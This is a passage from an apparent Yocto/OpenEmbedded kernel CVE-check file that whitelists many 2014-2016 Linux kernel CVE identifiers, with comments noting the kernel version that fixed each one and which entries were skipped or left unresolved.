1120CVE_CHECK_WHITELIST += "CVE-2014-8884"
1121
1122# fixed-version: Fixed after version 3.19rc1
1123CVE_CHECK_WHITELIST += "CVE-2014-8989"
1124
1125# fixed-version: Fixed after version 3.18rc6
1126CVE_CHECK_WHITELIST += "CVE-2014-9090"
1127
1128# fixed-version: Fixed after version 3.18rc6
1129CVE_CHECK_WHITELIST += "CVE-2014-9322"
1130
1131# fixed-version: Fixed after version 3.19rc1
1132CVE_CHECK_WHITELIST += "CVE-2014-9419"
1133
1134# fixed-version: Fixed after version 3.19rc1
1135CVE_CHECK_WHITELIST += "CVE-2014-9420"
1136
1137# fixed-version: Fixed after version 3.19rc3
1138CVE_CHECK_WHITELIST += "CVE-2014-9428"
1139
1140# fixed-version: Fixed after version 3.19rc4
1141CVE_CHECK_WHITELIST += "CVE-2014-9529"
1142
1143# fixed-version: Fixed after version 3.19rc3
1144CVE_CHECK_WHITELIST += "CVE-2014-9584"
1145
1146# fixed-version: Fixed after version 3.19rc4
1147CVE_CHECK_WHITELIST += "CVE-2014-9585"
1148
1149# fixed-version: Fixed after version 3.19rc1
1150CVE_CHECK_WHITELIST += "CVE-2014-9644"
1151
1152# fixed-version: Fixed after version 3.19rc1
1153CVE_CHECK_WHITELIST += "CVE-2014-9683"
1154
1155# fixed-version: Fixed after version 3.19rc1
1156CVE_CHECK_WHITELIST += "CVE-2014-9710"
1157
1158# fixed-version: Fixed after version 3.15rc1
1159CVE_CHECK_WHITELIST += "CVE-2014-9715"
1160
1161# fixed-version: Fixed after version 4.1rc1
1162CVE_CHECK_WHITELIST += "CVE-2014-9717"
1163
1164# fixed-version: Fixed after version 3.19rc3
1165CVE_CHECK_WHITELIST += "CVE-2014-9728"
1166
1167# fixed-version: Fixed after version 3.19rc3
1168CVE_CHECK_WHITELIST += "CVE-2014-9729"
1169
1170# fixed-version: Fixed after version 3.19rc3
1171CVE_CHECK_WHITELIST += "CVE-2014-9730"
1172
1173# fixed-version: Fixed after version 3.19rc3
1174CVE_CHECK_WHITELIST += "CVE-2014-9731"
1175
1176# Skipping CVE-2014-9777, no affected_versions
1177
1178# Skipping CVE-2014-9778, no affected_versions
1179
1180# Skipping CVE-2014-9779, no affected_versions
1181
1182# Skipping CVE-2014-9780, no affected_versions
1183
1184# Skipping CVE-2014-9781, no affected_versions
1185
1186# Skipping CVE-2014-9782, no affected_versions
1187
1188# Skipping CVE-2014-9783, no affected_versions
1189
1190# Skipping CVE-2014-9784, no affected_versions
1191
1192# Skipping CVE-2014-9785, no affected_versions
1193
1194# Skipping CVE-2014-9786, no affected_versions
1195
1196# Skipping CVE-2014-9787, no affected_versions
1197
1198# Skipping CVE-2014-9788, no affected_versions
1199
1200# Skipping CVE-2014-9789, no affected_versions
1201
1202# fixed-version: Fixed after version 3.16rc1
1203CVE_CHECK_WHITELIST += "CVE-2014-9803"
1204
1205# Skipping CVE-2014-9863, no affected_versions
1206
1207# Skipping CVE-2014-9864, no affected_versions
1208
1209# Skipping CVE-2014-9865, no affected_versions
1210
1211# Skipping CVE-2014-9866, no affected_versions
1212
1213# Skipping CVE-2014-9867, no affected_versions
1214
1215# Skipping CVE-2014-9868, no affected_versions
1216
1217# Skipping CVE-2014-9869, no affected_versions
1218
1219# fixed-version: Fixed after version 3.11rc1
1220CVE_CHECK_WHITELIST += "CVE-2014-9870"
1221
1222# Skipping CVE-2014-9871, no affected_versions
1223
1224# Skipping CVE-2014-9872, no affected_versions
1225
1226# Skipping CVE-2014-9873, no affected_versions
1227
1228# Skipping CVE-2014-9874, no affected_versions
1229
1230# Skipping CVE-2014-9875, no affected_versions
1231
1232# Skipping CVE-2014-9876, no affected_versions
1233
1234# Skipping CVE-2014-9877, no affected_versions
1235
1236# Skipping CVE-2014-9878, no affected_versions
1237
1238# Skipping CVE-2014-9879, no affected_versions
1239
1240# Skipping CVE-2014-9880, no affected_versions
1241
1242# Skipping CVE-2014-9881, no affected_versions
1243
1244# Skipping CVE-2014-9882, no affected_versions
1245
1246# Skipping CVE-2014-9883, no affected_versions
1247
1248# Skipping CVE-2014-9884, no affected_versions
1249
1250# Skipping CVE-2014-9885, no affected_versions
1251
1252# Skipping CVE-2014-9886, no affected_versions
1253
1254# Skipping CVE-2014-9887, no affected_versions
1255
1256# fixed-version: Fixed after version 3.13rc1
1257CVE_CHECK_WHITELIST += "CVE-2014-9888"
1258
1259# Skipping CVE-2014-9889, no affected_versions
1260
1261# Skipping CVE-2014-9890, no affected_versions
1262
1263# Skipping CVE-2014-9891, no affected_versions
1264
1265# Skipping CVE-2014-9892, no affected_versions
1266
1267# Skipping CVE-2014-9893, no affected_versions
1268
1269# Skipping CVE-2014-9894, no affected_versions
1270
1271# fixed-version: Fixed after version 3.11rc1
1272CVE_CHECK_WHITELIST += "CVE-2014-9895"
1273
1274# Skipping CVE-2014-9896, no affected_versions
1275
1276# Skipping CVE-2014-9897, no affected_versions
1277
1278# Skipping CVE-2014-9898, no affected_versions
1279
1280# Skipping CVE-2014-9899, no affected_versions
1281
1282# Skipping CVE-2014-9900, no affected_versions
1283
1284# fixed-version: Fixed after version 3.14rc4
1285CVE_CHECK_WHITELIST += "CVE-2014-9903"
1286
1287# fixed-version: Fixed after version 3.17rc1
1288CVE_CHECK_WHITELIST += "CVE-2014-9904"
1289
1290# fixed-version: Fixed after version 3.16rc1
1291CVE_CHECK_WHITELIST += "CVE-2014-9914"
1292
1293# fixed-version: Fixed after version 3.18rc2
1294CVE_CHECK_WHITELIST += "CVE-2014-9922"
1295
1296# fixed-version: Fixed after version 3.19rc1
1297CVE_CHECK_WHITELIST += "CVE-2014-9940"
1298
1299# fixed-version: Fixed after version 3.19rc6
1300CVE_CHECK_WHITELIST += "CVE-2015-0239"
1301
1302# fixed-version: Fixed after version 3.15rc5
1303CVE_CHECK_WHITELIST += "CVE-2015-0274"
1304
1305# fixed-version: Fixed after version 4.1rc1
1306CVE_CHECK_WHITELIST += "CVE-2015-0275"
1307
1308# Skipping CVE-2015-0777, no affected_versions
1309
1310# Skipping CVE-2015-1328, no affected_versions
1311
1312# fixed-version: Fixed after version 4.2rc5
1313CVE_CHECK_WHITELIST += "CVE-2015-1333"
1314
1315# fixed-version: Fixed after version 4.4rc5
1316CVE_CHECK_WHITELIST += "CVE-2015-1339"
1317
1318# fixed-version: Fixed after version 4.9rc1
1319CVE_CHECK_WHITELIST += "CVE-2015-1350"
1320
1321# fixed-version: Fixed after version 4.1rc7
1322CVE_CHECK_WHITELIST += "CVE-2015-1420"
1323
1324# fixed-version: Fixed after version 3.19rc7
1325CVE_CHECK_WHITELIST += "CVE-2015-1421"
1326
1327# fixed-version: Fixed after version 3.19rc7
1328CVE_CHECK_WHITELIST += "CVE-2015-1465"
1329
1330# fixed-version: Fixed after version 3.19rc5
1331CVE_CHECK_WHITELIST += "CVE-2015-1573"
1332
1333# fixed-version: Fixed after version 4.0rc1
1334CVE_CHECK_WHITELIST += "CVE-2015-1593"
1335
1336# fixed-version: Fixed after version 3.16rc1
1337CVE_CHECK_WHITELIST += "CVE-2015-1805"
1338
1339# fixed-version: Fixed after version 3.19rc7
1340CVE_CHECK_WHITELIST += "CVE-2015-2041"
1341
1342# fixed-version: Fixed after version 3.19
1343CVE_CHECK_WHITELIST += "CVE-2015-2042"
1344
1345# fixed-version: Fixed after version 4.0rc4
1346CVE_CHECK_WHITELIST += "CVE-2015-2150"
1347
1348# fixed-version: Fixed after version 4.0rc1
1349CVE_CHECK_WHITELIST += "CVE-2015-2666"
1350
1351# fixed-version: Fixed after version 4.0rc3
1352CVE_CHECK_WHITELIST += "CVE-2015-2672"
1353
1354# fixed-version: Fixed after version 4.0rc6
1355CVE_CHECK_WHITELIST += "CVE-2015-2686"
1356
1357# fixed-version: Fixed after version 4.0rc3
1358CVE_CHECK_WHITELIST += "CVE-2015-2830"
1359
1360# CVE-2015-2877 has no known resolution
1361
1362# fixed-version: Fixed after version 4.0rc7
1363CVE_CHECK_WHITELIST += "CVE-2015-2922"
1364
1365# fixed-version: Fixed after version 4.3rc1
1366CVE_CHECK_WHITELIST += "CVE-2015-2925"
1367
1368# fixed-version: Fixed after version 4.2rc1
1369CVE_CHECK_WHITELIST += "CVE-2015-3212"
1370
1371# fixed-version: Fixed after version 2.6.33rc8
1372CVE_CHECK_WHITELIST += "CVE-2015-3214"
1373
1374# fixed-version: Fixed after version 4.2rc2
1375CVE_CHECK_WHITELIST += "CVE-2015-3288"
1376
1377# fixed-version: Fixed after version 4.2rc3
1378CVE_CHECK_WHITELIST += "CVE-2015-3290"
1379
1380# fixed-version: Fixed after version 4.2rc3
1381CVE_CHECK_WHITELIST += "CVE-2015-3291"
1382
1383# fixed-version: Fixed after version 4.0rc5
1384CVE_CHECK_WHITELIST += "CVE-2015-3331"
1385
1386# Skipping CVE-2015-3332, no affected_versions
1387
1388# fixed-version: Fixed after version 4.1rc1
1389CVE_CHECK_WHITELIST += "CVE-2015-3339"
1390
1391# fixed-version: Fixed after version 4.1rc2
1392CVE_CHECK_WHITELIST += "CVE-2015-3636"
1393
1394# fixed-version: Fixed after version 4.1rc7
1395CVE_CHECK_WHITELIST += "CVE-2015-4001"
1396
1397# fixed-version: Fixed after version 4.1rc7
1398CVE_CHECK_WHITELIST += "CVE-2015-4002"
1399
1400# fixed-version: Fixed after version 4.1rc7
1401CVE_CHECK_WHITELIST += "CVE-2015-4003"
1402
1403# fixed-version: Fixed after version 4.3rc1
1404CVE_CHECK_WHITELIST += "CVE-2015-4004"
1405
1406# fixed-version: Fixed after version 4.0rc1
1407CVE_CHECK_WHITELIST += "CVE-2015-4036"
1408
1409# fixed-version: Fixed after version 4.0rc1
1410CVE_CHECK_WHITELIST += "CVE-2015-4167"
1411
1412# fixed-version: Fixed after version 3.13rc5
1413CVE_CHECK_WHITELIST += "CVE-2015-4170"
1414
1415# fixed-version: Fixed after version 4.1rc1
1416CVE_CHECK_WHITELIST += "CVE-2015-4176"
1417
1418# fixed-version: Fixed after version 4.1rc1
1419CVE_CHECK_WHITELIST += "CVE-2015-4177"
1420
1421# fixed-version: Fixed after version 4.1rc1
1422CVE_CHECK_WHITELIST += "CVE-2015-4178"
1423
1424# fixed-version: Fixed after version 4.2rc1
1425CVE_CHECK_WHITELIST += "CVE-2015-4692"
1426
1427# fixed-version: Fixed after version 4.1rc6
1428CVE_CHECK_WHITELIST += "CVE-2015-4700"
1429
1430# fixed-version: Fixed after version 4.2rc7
1431CVE_CHECK_WHITELIST += "CVE-2015-5156"
1432
1433# fixed-version: Fixed after version 4.2rc3
1434CVE_CHECK_WHITELIST += "CVE-2015-5157"
1435
1436# fixed-version: Fixed after version 4.3rc3
1437CVE_CHECK_WHITELIST += "CVE-2015-5257"
1438
1439# fixed-version: Fixed after version 4.3rc3
1440CVE_CHECK_WHITELIST += "CVE-2015-5283"
1441
1442# fixed-version: Fixed after version 4.4rc1
1443CVE_CHECK_WHITELIST += "CVE-2015-5307"
1444
1445# fixed-version: Fixed after version 4.4rc1
1446CVE_CHECK_WHITELIST += "CVE-2015-5327"
1447
1448# fixed-version: Fixed after version 4.1rc7
1449CVE_CHECK_WHITELIST += "CVE-2015-5364"
1450
1451# fixed-version: Fixed after version 4.1rc7
1452CVE_CHECK_WHITELIST += "CVE-2015-5366"
1453
1454# fixed-version: Fixed after version 4.2rc6
1455CVE_CHECK_WHITELIST += "CVE-2015-5697"
1456
1457# fixed-version: Fixed after version 4.1rc3
1458CVE_CHECK_WHITELIST += "CVE-2015-5706"
1459
1460# fixed-version: Fixed after version 4.1rc1
1461CVE_CHECK_WHITELIST += "CVE-2015-5707"
1462
1463# fixed-version: Fixed after version 4.2rc5
1464CVE_CHECK_WHITELIST += "CVE-2015-6252"
1465
1466# fixed-version: Fixed after version 4.1rc1
1467CVE_CHECK_WHITELIST += "CVE-2015-6526"
1468
1469# CVE-2015-6619 has no known resolution
1470
1471# CVE-2015-6646 has no known resolution
1472
1473# fixed-version: Fixed after version 4.3rc1
1474CVE_CHECK_WHITELIST += "CVE-2015-6937"
1475
1476# Skipping CVE-2015-7312, no affected_versions
1477
1478# fixed-version: Fixed after version 3.7rc1
1479CVE_CHECK_WHITELIST += "CVE-2015-7509"
1480
1481# fixed-version: Fixed after version 4.4rc7
1482CVE_CHECK_WHITELIST += "CVE-2015-7513"
1483
1484# fixed-version: Fixed after version 4.4rc6
1485CVE_CHECK_WHITELIST += "CVE-2015-7515"
1486
1487# fixed-version: Fixed after version 4.4rc8
1488CVE_CHECK_WHITELIST += "CVE-2015-7550"
1489
1490# Skipping CVE-2015-7553, no affected_versions
1491
1492# fixed-version: Fixed after version 4.5rc2
1493CVE_CHECK_WHITELIST += "CVE-2015-7566"
1494
1495# fixed-version: Fixed after version 4.3rc4
1496CVE_CHECK_WHITELIST += "CVE-2015-7613"
1497
1498# fixed-version: Fixed after version 4.4rc1
1499CVE_CHECK_WHITELIST += "CVE-2015-7799"
1500
1501# fixed-version: Fixed after version 4.6rc6
1502CVE_CHECK_WHITELIST += "CVE-2015-7833"
1503
1504# Skipping CVE-2015-7837, no affected_versions
1505
1506# fixed-version: Fixed after version 4.3rc7
1507CVE_CHECK_WHITELIST += "CVE-2015-7872"
1508
1509# fixed-version: Fixed after version 4.4rc1
1510CVE_CHECK_WHITELIST += "CVE-2015-7884"
1511
1512# fixed-version: Fixed after version 4.4rc1
1513CVE_CHECK_WHITELIST += "CVE-2015-7885"
1514
1515# fixed-version: Fixed after version 4.4rc4
1516CVE_CHECK_WHITELIST += "CVE-2015-7990"
1517
1518# Skipping CVE-2015-8019, no affected_versions
1519
1520# fixed-version: Fixed after version 4.4rc1
1521CVE_CHECK_WHITELIST += "CVE-2015-8104"
1522
1523# fixed-version: Fixed after version 4.0rc3
1524CVE_CHECK_WHITELIST += "CVE-2015-8215"
1525
1526# fixed-version: Fixed after version 2.6.34rc1
1527CVE_CHECK_WHITELIST += "CVE-2015-8324"
1528
1529# fixed-version: Fixed after version 4.4rc1
1530CVE_CHECK_WHITELIST += "CVE-2015-8374"
1531
1532# fixed-version: Fixed after version 4.4rc3
1533CVE_CHECK_WHITELIST += "CVE-2015-8539"
1534
1535# fixed-version: Fixed after version 4.4rc6
1536CVE_CHECK_WHITELIST += "CVE-2015-8543"
1537
1538# fixed-version: Fixed after version 4.4rc6
1539CVE_CHECK_WHITELIST += "CVE-2015-8550"
1540
1541# fixed-version: Fixed after version 4.4rc6
1542CVE_CHECK_WHITELIST += "CVE-2015-8551"
1543
1544# fixed-version: Fixed after version 4.4rc6
1545CVE_CHECK_WHITELIST += "CVE-2015-8552"
1546
1547# fixed-version: Fixed after version 4.4rc6
1548CVE_CHECK_WHITELIST += "CVE-2015-8553"
1549
1550# fixed-version: Fixed after version 4.4rc6
1551CVE_CHECK_WHITELIST += "CVE-2015-8569"
1552
1553# fixed-version: Fixed after version 4.4rc6
1554CVE_CHECK_WHITELIST += "CVE-2015-8575"
1555
1556# fixed-version: Fixed after version 4.4rc4
1557CVE_CHECK_WHITELIST += "CVE-2015-8660"
1558
1559# fixed-version: Fixed after version 4.10rc1
1560CVE_CHECK_WHITELIST += "CVE-2015-8709"
1561
1562# fixed-version: Fixed after version 4.3rc1
1563CVE_CHECK_WHITELIST += "CVE-2015-8746"
1564
1565# fixed-version: Fixed after version 4.3rc4
1566CVE_CHECK_WHITELIST += "CVE-2015-8767"
1567
1568# fixed-version: Fixed after version 4.4rc5
1569CVE_CHECK_WHITELIST += "CVE-2015-8785"
1570
1571# fixed-version: Fixed after version 4.4rc1
1572CVE_CHECK_WHITELIST += "CVE-2015-8787"
1573
1574# fixed-version: Fixed after version 4.5rc1
1575CVE_CHECK_WHITELIST += "CVE-2015-8812"
1576
1577# fixed-version: Fixed after version 4.4rc6
1578CVE_CHECK_WHITELIST += "CVE-2015-8816"
1579
1580# fixed-version: Fixed after version 4.1rc1
1581CVE_CHECK_WHITELIST += "CVE-2015-8830"
1582
1583# fixed-version: Fixed after version 4.5rc1
1584CVE_CHECK_WHITELIST += "CVE-2015-8839"
1585
1586# fixed-version: Fixed after version 4.4rc3
1587CVE_CHECK_WHITELIST += "CVE-2015-8844"
1588
1589# fixed-version: Fixed after version 4.4rc3
1590CVE_CHECK_WHITELIST += "CVE-2015-8845"
1591
1592# Skipping CVE-2015-8937, no affected_versions
1593
1594# Skipping CVE-2015-8938, no affected_versions
1595
1596# Skipping CVE-2015-8939, no affected_versions
1597
1598# Skipping CVE-2015-8940, no affected_versions
1599
1600# Skipping CVE-2015-8941, no affected_versions
1601
1602# Skipping CVE-2015-8942, no affected_versions
1603
1604# Skipping CVE-2015-8943, no affected_versions
1605
1606# Skipping CVE-2015-8944, no affected_versions
1607
1608# fixed-version: Fixed after version 4.1rc2
1609CVE_CHECK_WHITELIST += "CVE-2015-8950"
1610
1611# fixed-version: Fixed after version 4.6rc1
1612CVE_CHECK_WHITELIST += "CVE-2015-8952"
1613
1614# fixed-version: Fixed after version 4.3
1615CVE_CHECK_WHITELIST += "CVE-2015-8953"
1616
1617# fixed-version: Fixed after version 4.1rc1
1618CVE_CHECK_WHITELIST += "CVE-2015-8955"
1619
1620# fixed-version: Fixed after version 4.2rc1
1621CVE_CHECK_WHITELIST += "CVE-2015-8956"
1622
1623# fixed-version: Fixed after version 4.4rc1
1624CVE_CHECK_WHITELIST += "CVE-2015-8961"
1625
1626# fixed-version: Fixed after version 4.4rc1
1627CVE_CHECK_WHITELIST += "CVE-2015-8962"
1628
1629# fixed-version: Fixed after version 4.4
1630CVE_CHECK_WHITELIST += "CVE-2015-8963"
1631
1632# fixed-version: Fixed after version 4.5rc1
1633CVE_CHECK_WHITELIST += "CVE-2015-8964"
1634
1635# fixed-version: Fixed after version 4.4rc8
1636CVE_CHECK_WHITELIST += "CVE-2015-8966"
1637
1638# fixed-version: Fixed after version 4.0rc1
1639CVE_CHECK_WHITELIST += "CVE-2015-8967"
1640
1641# fixed-version: Fixed after version 4.5rc1
1642CVE_CHECK_WHITELIST += "CVE-2015-8970"
1643
1644# fixed-version: Fixed after version 3.19rc7
1645CVE_CHECK_WHITELIST += "CVE-2015-9004"
1646
1647# fixed-version: Fixed after version 4.3rc1
1648CVE_CHECK_WHITELIST += "CVE-2015-9016"
1649
1650# fixed-version: Fixed after version 4.2rc1
1651CVE_CHECK_WHITELIST += "CVE-2015-9289"
1652
1653# fixed-version: Fixed after version 4.5rc1
1654CVE_CHECK_WHITELIST += "CVE-2016-0617"
1655
1656# fixed-version: Fixed after version 4.5rc2
1657CVE_CHECK_WHITELIST += "CVE-2016-0723"
1658
1659# fixed-version: Fixed after version 4.5rc1
1660CVE_CHECK_WHITELIST += "CVE-2016-0728"
1661
1662# fixed-version: Fixed after version 4.6
1663CVE_CHECK_WHITELIST += "CVE-2016-0758"
1664
1665# Skipping CVE-2016-0774, no affected_versions
1666
1667# fixed-version: Fixed after version 4.3rc1
1668CVE_CHECK_WHITELIST += "CVE-2016-0821"
1669
1670# fixed-version: Fixed after version 4.0rc5
1671CVE_CHECK_WHITELIST += "CVE-2016-0823"
1672
1673# fixed-version: Fixed after version 4.8rc7
1674CVE_CHECK_WHITELIST += "CVE-2016-10044"
1675
1676# fixed-version: Fixed after version 4.10rc1
1677CVE_CHECK_WHITELIST += "CVE-2016-10088"
1678
1679# fixed-version: Fixed after version 4.9
1680CVE_CHECK_WHITELIST += "CVE-2016-10147"
1681
1682# fixed-version: Fixed after version 4.9rc8
1683CVE_CHECK_WHITELIST += "CVE-2016-10150"
1684
1685# fixed-version: Fixed after version 4.10rc1
1686CVE_CHECK_WHITELIST += "CVE-2016-10153"
1687
1688# fixed-version: Fixed after version 4.10rc1
1689CVE_CHECK_WHITELIST += "CVE-2016-10154"
1690
1691# fixed-version: Fixed after version 4.9rc7
1692CVE_CHECK_WHITELIST += "CVE-2016-10200"
1693
1694# fixed-version: Fixed after version 4.10rc1
1695CVE_CHECK_WHITELIST += "CVE-2016-10208"
1696
1697# fixed-version: Fixed after version 4.5rc1
1698CVE_CHECK_WHITELIST += "CVE-2016-10229"
1699
1700# fixed-version: Fixed after version 4.8rc6
1701CVE_CHECK_WHITELIST += "CVE-2016-10318"
1702
1703# fixed-version: Fixed after version 4.19rc1
1704CVE_CHECK_WHITELIST += "CVE-2016-10723"
1705
1706# fixed-version: Fixed after version 4.10rc1
1707CVE_CHECK_WHITELIST += "CVE-2016-10741"
1708
1709# fixed-version: Fixed after version 4.10rc1
1710CVE_CHECK_WHITELIST += "CVE-2016-10764"
1711
1712# fixed-version: Fixed after version 4.8rc1
1713CVE_CHECK_WHITELIST += "CVE-2016-10905"
1714
1715# fixed-version: Fixed after version 4.5rc6
1716CVE_CHECK_WHITELIST += "CVE-2016-10906"
1717
1718# fixed-version: Fixed after version 4.9rc1
1719CVE_CHECK_WHITELIST += "CVE-2016-10907"
1720
1721# fixed-version: Fixed after version 4.7rc5
1722CVE_CHECK_WHITELIST += "CVE-2016-1237"
1723
1724# fixed-version: Fixed after version 4.5rc1
1725CVE_CHECK_WHITELIST += "CVE-2016-1575"
1726
1727# fixed-version: Fixed after version 4.5rc1
1728CVE_CHECK_WHITELIST += "CVE-2016-1576"
1729
1730# fixed-version: Fixed after version 4.7rc3
1731CVE_CHECK_WHITELIST += "CVE-2016-1583"
1732
1733# fixed-version: Fixed after version 4.3rc1
1734CVE_CHECK_WHITELIST += "CVE-2016-2053"
1735
1736# fixed-version: Fixed after version 4.5rc1
1737CVE_CHECK_WHITELIST += "CVE-2016-2069"
1738
1739# fixed-version: Fixed after version 4.4
1740CVE_CHECK_WHITELIST += "CVE-2016-2070"
1741
1742# fixed-version: Fixed after version 4.5rc4
1743CVE_CHECK_WHITELIST += "CVE-2016-2085"
1744
1745# fixed-version: Fixed after version 4.6rc5
1746CVE_CHECK_WHITELIST += "CVE-2016-2117"
1747
1748# fixed-version: Fixed after version 4.5
1749CVE_CHECK_WHITELIST += "CVE-2016-2143"
1750
1751# fixed-version: Fixed after version 4.6rc1
1752CVE_CHECK_WHITELIST += "CVE-2016-2184"
1753
1754# fixed-version: Fixed after version 4.6rc1
1755CVE_CHECK_WHITELIST += "CVE-2016-2185"
1756
1757# fixed-version: Fixed after version 4.6rc1
1758CVE_CHECK_WHITELIST += "CVE-2016-2186"
1759
1760# fixed-version: Fixed after version 4.6rc5
1761CVE_CHECK_WHITELIST += "CVE-2016-2187"
1762
1763# fixed-version: Fixed after version 4.11rc2
1764CVE_CHECK_WHITELIST += "CVE-2016-2188"
1765
1766# fixed-version: Fixed after version 4.5rc4
1767CVE_CHECK_WHITELIST += "CVE-2016-2383"
1768
1769# fixed-version: Fixed after version 4.5rc4
1770CVE_CHECK_WHITELIST += "CVE-2016-2384"
1771
1772# fixed-version: Fixed after version 4.5rc1
1773CVE_CHECK_WHITELIST += "CVE-2016-2543"
1774
1775# fixed-version: Fixed after version 4.5rc1
1776CVE_CHECK_WHITELIST += "CVE-2016-2544"
1777
1778# fixed-version: Fixed after version 4.5rc1
1779CVE_CHECK_WHITELIST += "CVE-2016-2545"
1780
1781# fixed-version: Fixed after version 4.5rc1
1782CVE_CHECK_WHITELIST += "CVE-2016-2546"
1783
1784# fixed-version: Fixed after version 4.5rc1
1785CVE_CHECK_WHITELIST += "CVE-2016-2547"
1786
1787# fixed-version: Fixed after version 4.5rc1
1788CVE_CHECK_WHITELIST += "CVE-2016-2548"
1789
1790# fixed-version: Fixed after version 4.5rc1
1791CVE_CHECK_WHITELIST += "CVE-2016-2549"
1792
1793# fixed-version: Fixed after version 4.5rc4
1794CVE_CHECK_WHITELIST += "CVE-2016-2550"
1795
1796# fixed-version: Fixed after version 4.5rc2
1797CVE_CHECK_WHITELIST += "CVE-2016-2782"
1798
1799# fixed-version: Fixed after version 4.5rc1
1800CVE_CHECK_WHITELIST += "CVE-2016-2847"
1801
1802# Skipping CVE-2016-2853, no affected_versions
1803
1804# Skipping CVE-2016-2854, no affected_versions
1805
1806# fixed-version: Fixed after version 4.5
1807CVE_CHECK_WHITELIST += "CVE-2016-3044"
1808
1809# fixed-version: Fixed after version 4.4rc1
1810CVE_CHECK_WHITELIST += "CVE-2016-3070"
1811
1812# fixed-version: Fixed after version 4.6rc2
1813CVE_CHECK_WHITELIST += "CVE-2016-3134"
1814
1815# fixed-version: Fixed after version 4.6rc1
1816CVE_CHECK_WHITELIST += "CVE-2016-3135"
1817
1818# fixed-version: Fixed after version 4.6rc3
1819CVE_CHECK_WHITELIST += "CVE-2016-3136"
1820
1821# fixed-version: Fixed after version 4.6rc3
1822CVE_CHECK_WHITELIST += "CVE-2016-3137"
1823
1824# fixed-version: Fixed after version 4.6rc1
1825CVE_CHECK_WHITELIST += "CVE-2016-3138"
1826
1827# fixed-version: Fixed after version 3.17rc1
1828CVE_CHECK_WHITELIST += "CVE-2016-3139"
1829
1830# fixed-version: Fixed after version 4.6rc3
1831CVE_CHECK_WHITELIST += "CVE-2016-3140"
1832
1833# fixed-version: Fixed after version 4.6rc1
1834CVE_CHECK_WHITELIST += "CVE-2016-3156"
1835
1836# fixed-version: Fixed after version 4.6rc1
1837CVE_CHECK_WHITELIST += "CVE-2016-3157"
1838
1839# fixed-version: Fixed after version 4.6rc1
1840CVE_CHECK_WHITELIST += "CVE-2016-3672"
1841
1842# fixed-version: Fixed after version 4.6rc1
1843CVE_CHECK_WHITELIST += "CVE-2016-3689"
1844
1845# Skipping CVE-2016-3695, no affected_versions
1846
1847# Skipping CVE-2016-3699, no affected_versions
1848
1849# Skipping CVE-2016-3707, no affected_versions
1850
1851# fixed-version: Fixed after version 4.7rc1
1852CVE_CHECK_WHITELIST += "CVE-2016-3713"
1853
1854# CVE-2016-3775 has no known resolution
1855
1856# CVE-2016-3802 has no known resolution
1857
1858# CVE-2016-3803 has no known resolution
1859
1860# fixed-version: Fixed after version 4.4rc4
1861CVE_CHECK_WHITELIST += "CVE-2016-3841"
1862
1863# fixed-version: Fixed after version 4.8rc2
1864CVE_CHECK_WHITELIST += "CVE-2016-3857"
1865
1866# fixed-version: Fixed after version 4.5
1867CVE_CHECK_WHITELIST += "CVE-2016-3951"
1868
1869# fixed-version: Fixed after version 4.6rc3
1870CVE_CHECK_WHITELIST += "CVE-2016-3955"
1871
1872# fixed-version: Fixed after version 4.6rc5
1873CVE_CHECK_WHITELIST += "CVE-2016-3961"
1874
1875# fixed-version: Fixed after version 4.7rc1
1876CVE_CHECK_WHITELIST += "CVE-2016-4440"
1877
1878# fixed-version: Fixed after version 4.7rc4
1879CVE_CHECK_WHITELIST += "CVE-2016-4470"
1880
1881# fixed-version: Fixed after version 4.7rc1
1882CVE_CHECK_WHITELIST += "CVE-2016-4482"
1883
1884# fixed-version: Fixed after version 4.6
1885CVE_CHECK_WHITELIST += "CVE-2016-4485"
1886
1887# fixed-version: Fixed after version 4.6
1888CVE_CHECK_WHITELIST += "CVE-2016-4486"
1889
1890# fixed-version: Fixed after version 4.6rc6
1891CVE_CHECK_WHITELIST += "CVE-2016-4557"
1892
1893# fixed-version: Fixed after version 4.6rc7
1894CVE_CHECK_WHITELIST += "CVE-2016-4558"
1895
1896# fixed-version: Fixed after version 4.6rc6
1897CVE_CHECK_WHITELIST += "CVE-2016-4565"
1898
1899# fixed-version: Fixed after version 4.6rc6
1900CVE_CHECK_WHITELIST += "CVE-2016-4568"
1901
1902# fixed-version: Fixed after version 4.7rc1
1903CVE_CHECK_WHITELIST += "CVE-2016-4569"
1904
1905# fixed-version: Fixed after version 4.7rc1
1906CVE_CHECK_WHITELIST += "CVE-2016-4578"
1907
1908# fixed-version: Fixed after version 4.6
1909CVE_CHECK_WHITELIST += "CVE-2016-4580"
1910
1911# fixed-version: Fixed after version 4.6rc7
1912CVE_CHECK_WHITELIST += "CVE-2016-4581"
1913
1914# fixed-version: Fixed after version 4.7rc4
1915CVE_CHECK_WHITELIST += "CVE-2016-4794"
1916
1917# fixed-version: Fixed after version 4.6rc1
1918CVE_CHECK_WHITELIST += "CVE-2016-4805"
1919
1920# fixed-version: Fixed after version 4.6
1921CVE_CHECK_WHITELIST += "CVE-2016-4913"
1922
1923# fixed-version: Fixed after version 4.7rc1
1924CVE_CHECK_WHITELIST += "CVE-2016-4951"
1925
1926# fixed-version: Fixed after version 4.7rc1
1927CVE_CHECK_WHITELIST += "CVE-2016-4997"
1928
1929# fixed-version: Fixed after version 4.7rc1
1930CVE_CHECK_WHITELIST += "CVE-2016-4998"
1931
1932# fixed-version: Fixed after version 4.9rc2
1933CVE_CHECK_WHITELIST += "CVE-2016-5195"
1934
1935# fixed-version: Fixed after version 4.7rc3
1936CVE_CHECK_WHITELIST += "CVE-2016-5243"
1937
1938# fixed-version: Fixed after version 4.7rc3
1939CVE_CHECK_WHITELIST += "CVE-2016-5244"
1940
1941# Skipping CVE-2016-5340, no affected_versions
1942
1943# Skipping CVE-2016-5342, no affected_versions
1944
1945# Skipping CVE-2016-5343, no affected_versions
1946
1947# Skipping CVE-2016-5344, no affected_versions
1948
1949# fixed-version: Fixed after version 4.7
1950CVE_CHECK_WHITELIST += "CVE-2016-5400"
1951
1952# fixed-version: Fixed after version 4.8rc1
1953CVE_CHECK_WHITELIST += "CVE-2016-5412"
1954
1955# fixed-version: Fixed after version 4.7
1956CVE_CHECK_WHITELIST += "CVE-2016-5696"
1957
1958# fixed-version: Fixed after version 4.7rc1
1959CVE_CHECK_WHITELIST += "CVE-2016-5728"
1960
1961# fixed-version: Fixed after version 4.7rc6
1962CVE_CHECK_WHITELIST += "CVE-2016-5828"
1963
1964# fixed-version: Fixed after version 4.7rc5
1965CVE_CHECK_WHITELIST += "CVE-2016-5829"
1966
1967# CVE-2016-5870 has no known resolution
1968
1969# fixed-version: Fixed after version 4.6rc6
